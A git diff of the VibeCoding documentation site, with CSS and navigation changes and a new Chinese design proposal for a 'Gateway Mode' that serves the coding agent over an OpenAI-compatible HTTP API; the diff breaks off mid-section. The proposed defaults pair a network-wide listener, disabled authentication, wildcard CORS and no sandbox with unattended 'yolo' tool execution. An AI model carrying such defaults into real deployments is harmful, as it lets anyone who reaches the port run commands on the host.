 
         .content-card h2 {
-            font-size: 22px;
-            font-weight: 500;
-            color: var(--md-on-surface);
-            margin: 32px 0 16px;
+            font-size: 24px;
+            font-weight: 600;
+            color: var(--text-primary);
+            margin: 40px 0 16px;
             padding-bottom: 8px;
-            border-bottom: 1px solid var(--md-divider);
-            letter-spacing: 0.02em;
+            border-bottom: 1px solid var(--border);
+            letter-spacing: -0.01em;
         }
 
         .content-card h3 {
-            font-size: 18px;
-            font-weight: 500;
-            color: var(--md-on-surface);
-            margin: 24px 0 12px;
+            font-size: 20px;
+            font-weight: 600;
+            color: var(--text-primary);
+            margin: 32px 0 12px;
         }
 
         .content-card h4 {
             font-size: 16px;
-            font-weight: 500;
-            color: var(--md-on-surface-medium);
-            margin: 20px 0 8px;
+            font-weight: 600;
+            color: var(--text-secondary);
+            margin: 24px 0 8px;
         }
 
         .content-card p {
-            font-size: 14px;
-            line-height: 1.8;
+            font-size: 15px;
+            line-height: 1.75;
             margin-bottom: 16px;
-            color: var(--md-on-surface);
+            color: var(--text-secondary);
         }
 
         .content-card a {
-            color: var(--md-primary);
+            color: var(--primary);
             text-decoration: none;
             font-weight: 500;
+            transition: color var(--transition-fast);
         }
 
         .content-card a:hover {
+            color: var(--primary-hover);
             text-decoration: underline;
         }
 
         .content-card code {
-            font-family: 'Roboto Mono', monospace;
-            background-color: #F5F5F5;
+            font-family: 'JetBrains Mono', 'Fira Code', monospace;
+            background-color: var(--background-alt);
             padding: 2px 6px;
-            border-radius: 3px;
+            border-radius: var(--radius-sm);
             font-size: 13px;
-            color: var(--md-error);
+            color: var(--accent);
+            border: 1px solid var(--border-light);
         }
 
         .content-card pre {
-            background-color: #263238;
-            color: #ECEFF1;
-            padding: 16px;
-            border-radius: var(--md-radius);
+            background-color: #1e293b;
+            color: #e2e8f0;
+            padding: 20px;
+            border-radius: var(--radius-lg);
             overflow-x: auto;
-            margin-bottom: 16px;
+            margin-bottom: 20px;
             font-size: 13px;
-            line-height: 1.6;
+            line-height: 1.7;
+            border: 1px solid #334155;
         }
 
         .content-card pre code {
@@ -317,59 +420,99 @@
             color: inherit;
             padding: 0;
             font-size: inherit;
+            border: none;
         }
 
+        /* Syntax highlighting colors */
+        .content-card pre .keyword { color: #c084fc; }
+        .content-card pre .string { color: #86efac; }
+        .content-card pre .comment { color: #64748b; font-style: italic; }
+        .content-card pre .function { color: #60a5fa; }
+        .content-card pre .number { color: #fbbf24; }
+
         .content-card ul, .content-card ol {
             margin-bottom: 16px;
             padding-left: 24px;
         }
 
         .content-card li {
-            font-size: 14px;
-            line-height: 1.8;
-            margin-bottom: 4px;
+            font-size: 15px;
+            line-height: 1.75;
+            margin-bottom: 6px;
+            color: var(--text-secondary);
+        }
+
+        .content-card li::marker {
+            color: var(--text-muted);
         }
 
         .content-card table {
             width: 100%;
             border-collapse: collapse;
-            margin-bottom: 16px;
+            margin-bottom: 20px;
             font-size: 14px;
+            border-radius: var(--radius-lg);
+            overflow: hidden;
+            border: 1px solid var(--border);
         }
 
         .content-card th, .content-card td {
-            border: 1px solid var(--md-divider);
             padding: 12px 16px;
             text-align: left;
+            border-bottom: 1px solid var(--border);
         }
 
         .content-card th {
-            background-color: #FAFAFA;
-            font-weight: 500;
-            color: var(--md-on-surface);
+            background-color: var(--background-alt);
+            font-weight: 600;
+            color: var(--text-primary);
+            font-size: 13px;
+            text-transform: uppercase;
+            letter-spacing: 0.04em;
         }
 
-        .content-card tr:hover {
-            background-color: #F5F5F5;
+        .content-card td {
+            color: var(--text-secondary);
+        }
+
+        .content-card tr:hover td {
+            background-color: var(--surface-hover);
+        }
+
+        .content-card tr:last-child td {
+            border-bottom: none;
         }
 
         .content-card blockquote {
-            border-left: 4px solid var(--md-primary);
-            padding: 12px 16px;
-            margin: 16px 0;
-            background-color: #E3F2FD;
-            color: var(--md-on-surface);
+            border-left: 4px solid var(--primary);
+            padding: 16px 20px;
+            margin: 20px 0;
+            background-color: var(--primary-light);
+            border-radius: 0 var(--radius-md) var(--radius-md) 0;
+            color: var(--text-primary);
             font-size: 14px;
         }
 
+        .content-card blockquote p {
+            margin-bottom: 0;
+            color: inherit;
+        }
+
         .content-card hr {
             border: none;
-            border-top: 1px solid var(--md-divider);
-            margin: 24px 0;
+            border-top: 1px solid var(--border);
+            margin: 32px 0;
         }
 
         .content-card strong {
-            font-weight: 500;
+            font-weight: 600;
+            color: var(--text-primary);
+        }
+
+        .content-card img {
+            max-width: 100%;
+            border-radius: var(--radius-md);
+            margin: 16px 0;
         }
 
         /* Loading & Error States */
@@ -379,16 +522,16 @@
             align-items: center;
             justify-content: center;
             padding: 80px 0;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
         }
 
         .loading-spinner {
             width: 40px;
             height: 40px;
-            border: 3px solid var(--md-divider);
-            border-top-color: var(--md-primary);
+            border: 3px solid var(--border);
+            border-top-color: var(--primary);
             border-radius: 50%;
-            animation: spin 1s linear infinite;
+            animation: spin 0.8s linear infinite;
             margin-bottom: 16px;
         }
 
@@ -398,42 +541,44 @@
 
         .error-state {
             padding: 24px;
-            background-color: #FFEBEE;
-            border-radius: var(--md-radius);
-            color: var(--md-error);
+            background-color: var(--error-light);
+            border-radius: var(--radius-lg);
+            border: 1px solid var(--error);
         }
 
         .error-state h3 {
             font-size: 18px;
-            font-weight: 500;
+            font-weight: 600;
             margin-bottom: 8px;
-            color: var(--md-error);
+            color: var(--error);
         }
 
         .error-state p {
             font-size: 14px;
-            color: #B71C1C;
+            color: var(--error);
             margin-bottom: 0;
         }
 
-        /* Snackbar */
-        .snackbar {
+        /* Toast */
+        .toast {
             position: fixed;
             bottom: 24px;
             left: 50%;
             transform: translateX(-50%) translateY(100px);
-            background-color: #323232;
-            color: white;
-            padding: 14px 24px;
-            border-radius: var(--md-radius);
-            box-shadow: var(--md-shadow-3);
+            background-color: var(--text-primary);
+            color: var(--text-inverse);
+            padding: 12px 24px;
+            border-radius: var(--radius-lg);
+            box-shadow: var(--shadow-xl);
             font-size: 14px;
             z-index: 2000;
             opacity: 0;
-            transition: all 0.3s cubic-bezier(0.4, 0, 0.2, 1);
+            transition: all var(--transition-slow);
+            max-width: 400px;
+            text-align: center;
         }
 
-        .snackbar.show {
+        .toast.show {
             transform: translateX(-50%) translateY(0);
             opacity: 1;
         }
@@ -441,10 +586,11 @@
         /* Footer */
         .footer {
             margin-left: var(--sidebar-width);
-            padding: 24px 48px;
+            padding: 24px 32px;
             text-align: center;
-            color: var(--md-on-surface-medium);
+            color: var(--text-muted);
             font-size: 12px;
+            border-top: 1px solid var(--border);
         }
 
         /* Overlay for mobile */
@@ -457,6 +603,7 @@
             bottom: 0;
             background-color: rgba(0,0,0,0.5);
             z-index: 850;
+            backdrop-filter: blur(4px);
         }
 
         .overlay.active {
@@ -466,7 +613,11 @@
         /* Responsive */
         @media (max-width: 1024px) {
             .main-content {
-                padding: 24px 32px;
+                padding: 24px;
+            }
+            
+            .content-card {
+                padding: 32px;
             }
         }
 
@@ -481,16 +632,18 @@
 
             .nav-drawer.open {
                 transform: translateX(0);
-                box-shadow: var(--md-shadow-4);
+                box-shadow: var(--shadow-xl);
             }
 
             .main-content {
                 margin-left: 0;
                 padding: 16px;
+                max-width: 100%;
             }
 
             .content-card {
-                padding: 24px 16px;
+                padding: 24px 20px;
+                border-radius: var(--radius-md);
             }
 
             .footer {
@@ -498,15 +651,23 @@
                 padding: 16px;
             }
 
-            .github-btn {
+            .btn {
                 padding: 6px 12px;
                 font-size: 12px;
             }
 
-            .github-btn svg {
+            .btn svg {
                 width: 14px;
                 height: 14px;
             }
+
+            .app-bar__title {
+                font-size: 16px;
+            }
+
+            .lang-switcher {
+                display: none;
+            }
         }
 
         /* Scrollbar */
@@ -519,12 +680,29 @@
         }
 
         .nav-drawer::-webkit-scrollbar-thumb {
-            background-color: var(--md-on-surface-disabled);
+            background-color: var(--text-disabled);
             border-radius: 3px;
         }
 
         .nav-drawer::-webkit-scrollbar-thumb:hover {
-            background-color: var(--md-on-surface-medium);
+            background-color: var(--text-muted);
+        }
+
+        /* Selection */
+        ::selection {
+            background-color: var(--primary-light);
+            color: var(--primary-dark);
+        }
+
+        /* Focus styles */
+        :focus-visible {
+            outline: 2px solid var(--primary);
+            outline-offset: 2px;
+        }
+
+        /* Smooth scrolling */
+        html {
+            scroll-behavior: smooth;
         }
     </style>
 </head>
@@ -532,21 +710,23 @@
     <!-- App Bar -->
     <header class="app-bar">
         <button class="app-bar__menu" onclick="toggleDrawer()" aria-label="Menu">
-            <span class="material-icons">menu</span>
+            <span class="material-icons-outlined">menu</span>
         </button>
         <span class="app-bar__title">
             <img src="assets/logo.svg" alt="VibeCoding" class="app-bar__logo">
-            VibeCoding Documentation
+            VibeCoding Docs
         </span>
         <div class="app-bar__actions">
-            <a href="https://github.com/startvibecoding/vibecoding" target="_blank" rel="noopener noreferrer" class="github-btn">
+            <a href="https://github.com/startvibecoding/vibecoding" target="_blank" rel="noopener noreferrer" class="btn">
                 <svg viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg">
                     <path d="M12 0c-6.626 0-12 5.373-12 12 0 5.302 3.438 9.8 8.207 11.387.599.111.793-.261.793-.577v-2.234c-3.338.726-4.033-1.416-4.033-1.416-.546-1.387-1.333-1.756-1.333-1.756-1.089-.745.083-.729.083-.729 1.205.084 1.839 1.237 1.839 1.237 1.07 1.834 2.807 1.304 3.492.997.107-.775.418-1.305.762-1.604-2.665-.305-5.467-1.334-5.467-5.931 0-1.311.469-2.381 1.236-3.221-.124-.303-.535-1.524.117-3.176 0 0 1.008-.322 3.301 1.23.957-.266 1.983-.399 3.003-.404 1.02.005 2.047.138 3.006.404 2.291-1.552 3.297-1.23 3.297-1.23.653 1.653.242 2.874.118 3.176.77.84 1.235 1.911 1.235 3.221 0 4.609-2.807 5.624-5.479 5.921.43.372.823 1.102.823 2.222v3.293c0 .319.192.694.801.576 4.765-1.589 8.199-6.086 8.199-11.386 0-6.627-5.373-12-12-12z"/>
                 </svg>
                 GitHub
             </a>
-            <button class="lang-chip active" onclick="switchLanguage('en')">English</button>
-            <button class="lang-chip" onclick="switchLanguage('zh')">中文</button>
+            <div class="lang-switcher">
+                <button class="lang-btn active" onclick="switchLanguage('en')">EN</button>
+                <button class="lang-btn" onclick="switchLanguage('zh')">中文</button>
+            </div>
         </div>
     </header>
 
@@ -581,8 +761,8 @@
         <p>&copy; 2026-2027 VibeCoding. All rights reserved.</p>
     </footer>
 
-    <!-- Snackbar -->
-    <div class="snackbar" id="snackbar"></div>
+    <!-- Toast -->
+    <div class="toast" id="toast"></div>
 
     <script>
         // Configuration
@@ -592,14 +772,20 @@
                 items: [
                     { id: 'README', icon: 'home', title: 'Home' },
                     { id: 'getting-started', icon: 'rocket_launch', title: 'Quick Start' },
+                    { id: 'scenarios', icon: 'movie_creation', title: 'Scenarios' },
                     { id: 'cli-reference', icon: 'terminal', title: 'CLI Reference' },
                     { id: 'configuration', icon: 'settings', title: 'Configuration' },
+                    { id: 'hermes', icon: 'forum', title: 'Hermes Mode' },
+                    { id: 'a2a', icon: 'hub', title: 'A2A Protocol' },
                     { id: 'architecture', icon: 'architecture', title: 'Architecture' },
                     { id: 'tools', icon: 'build', title: 'Tools' },
                     { id: 'skills', icon: 'psychology', title: 'Skills' },
+                    { id: 'skillhub', icon: 'store', title: 'Skill Marketplace' },
                     { id: 'security', icon: 'security', title: 'Security' },
                     { id: 'acp', icon: 'extension', title: 'ACP / IDE' },
-                    { id: 'sessions', icon: 'forum', title: 'Sessions' },
+                    { id: 'gateway', icon: 'dns', title: 'Gateway Mode' },
+                    { id: 'sessions', icon: 'chat', title: 'Sessions' },
+                    { id: 'sdk', icon: 'integration_instructions', title: 'SDK & Sub-Agents' },
                     { id: 'development', icon: 'code', title: 'Development' },
                     { id: 'faq', icon: 'help_outline', title: 'FAQ' },
                     { id: 'changelog', icon: 'history', title: 'Changelog' }
@@ -610,14 +796,20 @@
                 items: [
                     { id: 'README', icon: 'home', title: '文档首页' },
                     { id: 'getting-started', icon: 'rocket_launch', title: '快速入门' },
+                    { id: 'scenarios', icon: 'movie_creation', title: '场景演示' },
                     { id: 'cli-reference', icon: 'terminal', title: '命令行参考' },
                     { id: 'configuration', icon: 'settings', title: '配置详解' },
+                    { id: 'hermes', icon: 'forum', title: 'Hermes 模式' },
+                    { id: 'a2a', icon: 'hub', title: 'A2A 协议' },
                     { id: 'architecture', icon: 'architecture', title: '系统架构' },
                     { id: 'tools', icon: 'build', title: '工具系统' },
                     { id: 'skills', icon: 'psychology', title: '技能系统' },
+                    { id: 'skillhub', icon: 'store', title: '在线Skill市场' },
                     { id: 'security', icon: 'security', title: '安全与沙箱' },
                     { id: 'acp', icon: 'extension', title: 'ACP / IDE 集成' },
-                    { id: 'sessions', icon: 'forum', title: '会话管理' },
+                    { id: 'gateway', icon: 'dns', title: 'Gateway 模式' },
+                    { id: 'sessions', icon: 'chat', title: '会话管理' },
+                    { id: 'sdk', icon: 'integration_instructions', title: 'SDK 与子 Agent' },
                     { id: 'development', icon: 'code', title: '开发指南' },
                     { id: 'faq', icon: 'help_outline', title: '常见问题' },
                     { id: 'changelog', icon: 'history', title: '更新日志' }
@@ -630,7 +822,7 @@
 
         // Hash Router
         function getHashRoute() {
-            const hash = window.location.hash.slice(1); // Remove #
+            const hash = window.location.hash.slice(1);
             if (!hash) return null;
 
             const parts = hash.split('/').filter(Boolean);
@@ -654,7 +846,7 @@
                     currentLanguage = route.lang;
                     updateLanguageButtons();
                 }
-                loadDocument(route.doc, false); // false = don't update hash again
+                loadDocument(route.doc, false);
             }
         }
 
@@ -671,7 +863,7 @@
                     <a class="nav-drawer__item ${item.id === currentDoc ? 'active' : ''}" 
                        data-doc="${item.id}"
                        onclick="navigateTo('${item.id}')">
-                        <span class="material-icons">${item.icon}</span>
+                        <span class="material-icons-outlined">${item.icon}</span>
                         <span>${item.title}</span>
                     </a>
                 </li>
@@ -700,23 +892,16 @@
                 contentDiv.innerHTML = marked.parse(text);
                 currentDoc = docId;
 
-                // Update hash
                 if (updateHash) {
                     setHashRoute(currentLanguage, docId);
                 }
 
-                // Update active state
                 document.querySelectorAll('.nav-drawer__item').forEach(item => {
                     item.classList.toggle('active', item.getAttribute('data-doc') === docId);
                 });
 
-                // Handle internal links
                 handleInternalLinks();
-
-                // Scroll to top
-                window.scrollTo(0, 0);
-
-                // Close mobile drawer
+                window.scrollTo({ top: 0, behavior: 'smooth' });
                 closeDrawer();
 
             } catch (error) {
@@ -752,12 +937,12 @@ <h3>Error Loading Document</h3>
             updateLanguageButtons();
             updateNavigation();
             loadDocument(currentDoc, true);
-            showSnackbar(lang === 'en' ? 'Switched to English' : '已切换到中文');
+            showToast(lang === 'en' ? 'Switched to English' : '已切换到中文');
         }
 
         function updateLanguageButtons() {
-            document.querySelectorAll('.lang-chip').forEach(btn => {
-                const btnLang = btn.textContent === 'English' ? 'en' : 'zh';
+            document.querySelectorAll('.lang-btn').forEach(btn => {
+                const btnLang = btn.textContent === 'EN' ? 'en' : 'zh';
                 btn.classList.toggle('active', btnLang === currentLanguage);
             });
         }
@@ -777,19 +962,18 @@ <h3>Error Loading Document</h3>
             overlay.classList.remove('active');
         }
 
-        // Snackbar
-        function showSnackbar(message) {
-            const snackbar = document.getElementById('snackbar');
-            snackbar.textContent = message;
-            snackbar.classList.add('show');
+        // Toast
+        function showToast(message) {
+            const toast = document.getElementById('toast');
+            toast.textContent = message;
+            toast.classList.add('show');
             setTimeout(() => {
-                snackbar.classList.remove('show');
+                toast.classList.remove('show');
             }, 3000);
         }
 
         // Initialize
         document.addEventListener('DOMContentLoaded', () => {
-            // Check hash route first
             const route = getHashRoute();
             if (route && DOCS[route.lang]) {
                 currentLanguage = route.lang;
@@ -798,9 +982,8 @@ <h3>Error Loading Document</h3>
 
             updateLanguageButtons();
             updateNavigation();
-            loadDocument(currentDoc, !route); // Only update hash if no initial route
+            loadDocument(currentDoc, !route);
 
-            // Listen for hash changes
             window.addEventListener('hashchange', handleHashChange);
         });
     </script>
diff --git a/docs/cache-optimization.md b/docs/proposal/cache-optimization.md
similarity index 100%
rename from docs/cache-optimization.md
rename to docs/proposal/cache-optimization.md
diff --git a/docs/proposal/gateway-proposal.md b/docs/proposal/gateway-proposal.md
new file mode 100644
index 0000000..e159321
--- /dev/null
+++ b/docs/proposal/gateway-proposal.md
@@ -0,0 +1,873 @@
+# Gateway Mode 方案设计
+
+> 状态: 已确认 (Approved) — v0.1.26 全部新增功能
+> 日期: 2026-05-28
+> 版本: v0.1.26
+
+## 1. 概述
+
+Gateway 模式将 VibeCoding 作为一个 HTTP 服务启动，对外暴露**标准 OpenAI Chat Completions API** (`/v1/chat/completions`)。
+任何兼容 OpenAI SDK 的客户端（Cursor、Continue、Open WebUI、自定义脚本等）都可以直接接入，
+后端实际由 VibeCoding agent 完成推理 + tool use 循环，对调用方完全透明。
+
+### 核心特性
+
+| 特性 | 说明 |
+|------|------|
+| **OpenAI 兼容 API** | 支持 `/v1/chat/completions`（streaming & non-streaming）和 `/v1/models` |
+| **多 Session** | 默认支持，每个请求可通过 header / body 关联 session，也可自动创建 |
+| **Sub-Agent 能力** | 可选开启（配置 `enableSubAgents: true`），复用现有 multi-agent 体系 |
+| **Bearer Token 认证** | 基于 `Authorization: Bearer <token>` header，配置文件控制，默认关闭 |
+| **独立配置文件** | `gateway.json`，与 `settings.json` 同目录 (`~/.vibecoding/`) |
+
+## 2. 启动方式
+
+```bash
+# 启动 gateway（默认 :8080）
+vibecoding gateway
+
+# 指定端口
+vibecoding gateway --port 9090
+
+# 指定 provider/model（覆盖 settings.json 默认值）
+vibecoding gateway --provider deepseek-openai --model deepseek-v4-flash
+
+# 指定默认工作目录
+vibecoding gateway --work-dir /home/user/projects
+
+# 指定配置文件路径
+vibecoding gateway --config /path/to/gateway.json
+
+# 启用 sub-agent
+vibecoding gateway --multi-agent
+
+# 启用 sandbox
+vibecoding gateway --sandbox
+
+# 启用 debug
+vibecoding gateway --debug --verbose
+```
+
+### 初始化配置文件
+
+```bash
+# 创建 gateway.json 模板（写入 ~/.vibecoding/gateway.json）
+vibecoding --init-gateway
+
+# 如果文件已存在，不覆盖，提示用户
+vibecoding --init-gateway
+# → gateway.json already exists: ~/.vibecoding/gateway.json
+
+# 强制覆盖
+vibecoding --init-gateway --force
+```
+
+`--init-gateway` 是 root command 的 flag（不是 gateway 子命令的），因为用户可能在还没有配置文件时就想生成模板。
+
+CLI 实现为 `rootCmd.AddCommand(gatewayCmd)`，与现有 `acp` 子命令平级。
+
+## 3. 配置文件
+
+### 3.1 路径
+
+`gateway.json` 位于 `config.ConfigDir()` （通常 `~/.vibecoding/gateway.json`），与 `settings.json` 同目录。
+
+### 3.2 Schema
+
+```jsonc
+{
+  // 监听地址
+  "listen": ":8080",
+
+  // 认证配置 - 默认关闭
+  "auth": {
+    "enabled": false,
+    // tokens 列表 - 任一匹配即通过
+    "tokens": [
+      "sk-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
+    ]
+  },
+
+  // 默认 mode（可被每个请求覆盖）
+  "defaultMode": "yolo",
+
+  // 默认 thinking level
+  "defaultThinkingLevel": "medium",
+
+  // 是否启用 sub-agent 能力
+  "enableSubAgents": false,
+
+  // Sandbox 配置
+  "sandbox": {
+    // 是否启用 sandbox（也可通过 --sandbox flag 开启）
+    "enabled": false,
+    // sandbox level: "none", "standard", "strict"
+    // 为空时根据 mode 自动推导：yolo→none, agent→standard, plan→strict
+    "level": ""
+    // 其他 sandbox 细节（allowedRead, deniedPaths 等）继承 settings.json 中的 sandbox 配置
+  },
+
+  // 工作目录安全
+  "allowedWorkDirs": [
+    // 允许请求级 x_working_dir 切换到的目录白名单
+    // 支持前缀匹配："/home/user/projects" 匹配 "/home/user/projects/foo"
+    // 为空 [] 表示仅允许使用 workingDir 默认值，禁止请求级切换
+    // 不设置此字段（null）则不做校验
+    "/home/user/projects",
+    "/opt/repos"
+  ],
+
+  // session 管理
+  "session": {
+    // session 空闲超时（秒），超时后自动清理。0 = 不超时
+    "idleTimeoutSeconds": 1800,
+    // 最大并发 session 数。0 = 不限制
+    "maxSessions": 0
+  },
+
+  // 默认工作目录 — agent 执行 tool 时的 cwd
+  // 为空时 fallback 到 gateway 进程的 cwd
+  "workingDir": "/home/user/projects",
+
+  // 跨域配置
+  "cors": {
+    "enabled": false,
+    "allowOrigins": ["*"]
+  },
+
+  // Provider/Model 覆盖（不设置则使用 settings.json 中的默认值）
+  "provider": "",
+  "model": "",
+
+  // Tool 可见性
+  "toolVisibility": {
+    // "content": 通过 content 字段发送 tool 状态信息（默认）
+    // "sse_event": 通过扩展 SSE event 发送（event: tool_status，不兼容标准 OpenAI SDK）
+    // "none": 不发送任何 tool 状态信息
+    "mode": "content"
+  },
+
+  // System prompt 处理策略
+  // "append": 客户端 system message 追加到内置 system prompt 末尾（默认）
+  // "ignore": 忽略客户端 system message
+  "systemPromptMode": "append",
+
+  // 请求超时（秒）— agent 执行的最大时长
+  // streaming 模式下只要有数据流动就不超时
+  "requestTimeoutSeconds": 1800,
+
+  // 全局并发限制（0 = 不限制）
+  "maxConcurrentRequests": 0,
+
+  // 日志级别
+  "logLevel": "info"  // "debug", "info", "warn", "error"
+}
+```
+
+### 3.3 配置加载优先级
+
+1. 请求级 `x_working_dir` / `x_mode`（仅部分字段）
+2. CLI flags（`--port`, `--multi-agent`, `--work-dir` 等）
+3. `gateway.json`
+4. `settings.json` 中的默认 provider/model/mode
+5. 进程 cwd（workingDir 最终 fallback）
+
+## 4. API 设计
+
+### 4.1 POST /v1/chat/completions
+
+**请求格式**（标准 OpenAI）:
+
+```jsonc
+{
+  "model": "deepseek-v4-flash",  // 可选，覆盖默认 model
+  "messages": [
+    {"role": "system", "content": "You are a helpful assistant."},
+    {"role": "user", "content": "Read the file main.go and explain it."}
+  ],
+  "stream": true,                // 支持 true/false
+  "temperature": 0.7,            // 透传给后端 provider
+  "max_tokens": 4096,            // 透传
+
+  // VibeCoding 扩展字段（可选）
+  "x_session_id": "sess-abc123",  // 关联已有 session
+  "x_mode": "yolo",               // 覆盖 mode
+  "x_working_dir": "/home/user/project"  // 覆盖工作目录
+}
+```
+
+**Non-streaming 响应**:
+
+```json
+{
+  "id": "chatcmpl-xxx",
+  "object": "chat.completion",
+  "created": 1716883200,
+  "model": "deepseek-v4-flash",
+  "choices": [
+    {
+      "index": 0,
+      "message": {
+        "role": "assistant",
+        "content": "Here is the explanation of main.go..."
+      },
+      "finish_reason": "stop"
+    }
+  ],
+  "usage": {
+    "prompt_tokens": 1234,
+    "completion_tokens": 567,
+    "total_tokens": 1801
+  },
+  "x_session_id": "sess-abc123",
+  "x_tool_calls": [
+    {"name": "read", "args": {"path": "main.go"}, "status": "completed"}
+  ]
+}
+```
+
+**Streaming 响应**（SSE）:
+
+```
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{"role":"assistant","content":"Here"},"finish_reason":null}]}
+
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{"content":" is"},"finish_reason":null}]}
+
+...
+
+data: {"id":"chatcmpl-xxx","object":"chat.completion.chunk","created":1716883200,"model":"deepseek-v4-flash","choices":[{"index":0,"delta":{},"finish_reason":"stop"}],"usage":{"prompt_tokens":1234,"completion_tokens":567,"total_tokens":1801}}
+
+data: [DONE]
+```
+
+### 4.2 GET /v1/models
+
+返回当前 provider 可用的模型列表：
+
+```json
+{
+  "object": "list",
+  "data": [
+    {
+      "id": "deepseek-v4-flash",
+      "object": "model",
+      "created": 1716883200,
+      "owned_by": "vibecoding"
+    }
+  ]
+}
+```
+
+### 4.3 GET /health
+
+健康检查端点（无需认证）：
+
+```json
+{"status": "ok", "version": "v0.1.26", "sessions": 3}
+```
+
+### 4.4 Session 管理端点（扩展，可选）
+
+```
+POST   /v1/vibecoding/sessions          创建 session
+GET    /v1/vibecoding/sessions           列出 session
+GET    /v1/vibecoding/sessions/:id       获取 session 详情
+DELETE /v1/vibecoding/sessions/:id       删除 session
+```
+
+这些是扩展端点，非 OpenAI 标准，前缀 `/v1/vibecoding/` 以区分。
+
+## 5. 架构设计
+
+### 5.1 模块关系
+
+```
+cmd/vibecoding/main.go
+  └── gatewayCmd (cobra.Command)
+        └── internal/gateway/
+              ├── gateway.go         # Server 主逻辑、路由
+              ├── config.go          # gateway.json 加载
+              ├── handler_chat.go    # /v1/chat/completions 处理
+              ├── handler_models.go  # /v1/models
+              ├── handler_health.go  # /health
+              ├── handler_session.go # session 管理端点
+              ├── auth.go            # Bearer Token 中间件
+              ├── commands.go        # /xxx 指令处理
+              ├── session_mgr.go     # 多 session 管理器
+              ├── streaming.go       # SSE streaming 辅助
+              └── types.go           # OpenAI API 类型定义
+```
+
+### 5.2 核心组件
+
+```
+┌─────────────────────────────────────────────────────────┐
+│                    HTTP Server                          │
+│  (net/http, 无外部框架)                                  │
+├──────────┬──────────┬───────────────┬───────────────────┤
+│ Auth MW  │ CORS MW  │  Logging MW   │                   │
+├──────────┴──────────┴───────────────┴───────────────────┤
+│                                                         │
+│  /v1/chat/completions ──► ChatHandler                   │
+│       │                                                 │
+│       ├─► SessionPool.GetOrCreate(sessionID)            │
+│       │     └── session.Manager (JSONL)                 │
+│       │                                                 │
+│       ├─► agent.New(Config{...}) + tools.Registry       │
+│       │     └── agent.Run(ctx, userMsg) → <-chan Event  │
+│       │                                                 │
+│       └─► EventToSSE / EventToJSON                      │
+│             └── OpenAI 格式 response                     │
+│                                                         │
+│  /v1/models ──► ModelsHandler                           │
+│       └── provider.Models()                             │
+│                                                         │
+│  /health ──► HealthHandler                              │
+│                                                         │
+└─────────────────────────────────────────────────────────┘
+```
+
+### 5.3 请求处理流程
+
+```
+HTTP Request
+    │
+    ▼
+1. Auth Middleware (如果 auth.enabled)
+    │ 检查 Authorization: Bearer <token>
+    │ 失败 → 401 Unauthorized
+    │
+    ▼
+2. CORS Middleware (如果 cors.enabled)
+    │
+    ▼
+3. Route Dispatch
+    │
+    ▼
+4. ChatHandler
+    │
+    ├─ 4a. 解析 OpenAI 格式请求
+    │       - messages → provider.Message 转换
+    │       - 提取 x_session_id（或生成新 ID）
+    │       - 提取 x_mode, x_working_dir
+    │
+    ├─ 4a.1 校验 x_working_dir
+    │       - 有 allowedWorkDirs → 前缀匹配校验
+    │       - 不通过 → 403 Forbidden
+    │
+    ├─ 4a.2 检查最后一条 user message 是否为 /xxx 指令
+    │       - 是指令 → 走指令分发（不创建 agent，不调用 LLM）
+    │       - 非指令 → 继续正常 agent 流程
+    │
+    ├─ 4b. 获取/创建 Session
+    │       - SessionPool.GetOrCreate(id, workDir)
+    │       - 关联 session.Manager, tools.Registry
+    │
+    ├─ 4c. 构建 Agent
+    │       - 复用 agent.Config + agent.New() 模式
+    │       - 加载 context files, skills
+    │       - 如果 enableSubAgents → AgentFactory + AgentManager
+    │
+    ├─ 4d. 将 OpenAI messages 转换为 VibeCoding 内部格式
+    │       - system message → extraContext / systemPrompt
+    │       - user/assistant messages → provider.Message
+    │       - 历史 messages → agent.LoadHistoryMessages()
+    │
+    ├─ 4e. 运行 Agent
+    │       - eventCh := agent.Run(ctx, lastUserMessage)
+    │
+    └─ 4f. 转换输出
+            │
+            ├── stream=true:
+            │   for event := range eventCh:
+            │     EventTextDelta → SSE chunk
+            │     EventToolCall → (内部处理，不暴露给客户端)
+            │     EventDone → final chunk + [DONE]
+            │
+            └── stream=false:
+                收集全部 text → 一次性返回 JSON
+```
+
+### 5.4 Session 管理
+
+```go
+// SessionPool 管理多个并发 session
+type SessionPool struct {
+    mu       sync.RWMutex
+    sessions map[string]*GatewaySession
+    maxSess  int
+    idleTTL  time.Duration
+}
+
+type GatewaySession struct {
+    ID        string
+    WorkDir   string
+    Manager   *session.Manager
+    Registry  *tools.Registry
+    AgentMgr  *agent.AgentManager  // 仅 enableSubAgents 时
+    LastUsed  time.Time
+    mu        sync.Mutex  // 保证单 session 串行处理
+}
+```
+
+**Session 映射策略**:
+
+1. 客户端通过 `x_session_id` 指定 → 直接使用
+2. 未指定 → 每个请求创建新 session（无状态模式）
+3. 通过 Authorization header 的 token hash 做 namespace（可选）
+
+**Session 并发控制**:
+- 每个 session 内部加锁，确保同一 session 的请求串行处理（agent loop 不支持并发）
+- 不同 session 之间完全并行
+
+**Session 生命周期**:
+- 创建：首次请求时自动创建
+- 活跃：有请求在处理或最近有请求
+- 空闲超时清理：后台 goroutine 定期扫描，超过 `idleTimeoutSeconds` 的 session 被销毁
+- 手动销毁：通过 DELETE `/v1/x/sessions/:id`
+
+### 5.5 Tool 调用处理
+
+Gateway 模式下 tool 调用对客户端透明，Agent 内部自动执行（mode 默认 `yolo`）。
+
+Tool 执行状态的可见性由 `toolVisibility.mode` 配置控制：
+
+| mode | 行为 | 兼容性 |
+|------|------|--------|
+| `"content"` (默认) | tool 执行时通过 `content` 字段发送状态信息，如 `[reading main.go...]` | ✅ 完全兼容标准 SDK |
+| `"sse_event"` | 通过扩展 SSE event 发送（`event: tool_status`） | ⚠️ 不兼容标准 OpenAI SDK，适合自定义客户端 |
+| `"none"` | 不发送任何 tool 状态，客户端只见最终文本 | ✅ 最干净 |
+
+**`content` 模式示例**（streaming）:
+```
+data: {"choices":[{"delta":{"content":"[reading main.go...]\n"}}]}
+data: {"choices":[{"delta":{"content":"[running: go test ./...]\n"}}]}
+data: {"choices":[{"delta":{"content":"Here is the analysis..."}}]}
+```
+
+**`sse_event` 模式示例**（streaming）:
+```
+event: tool_status
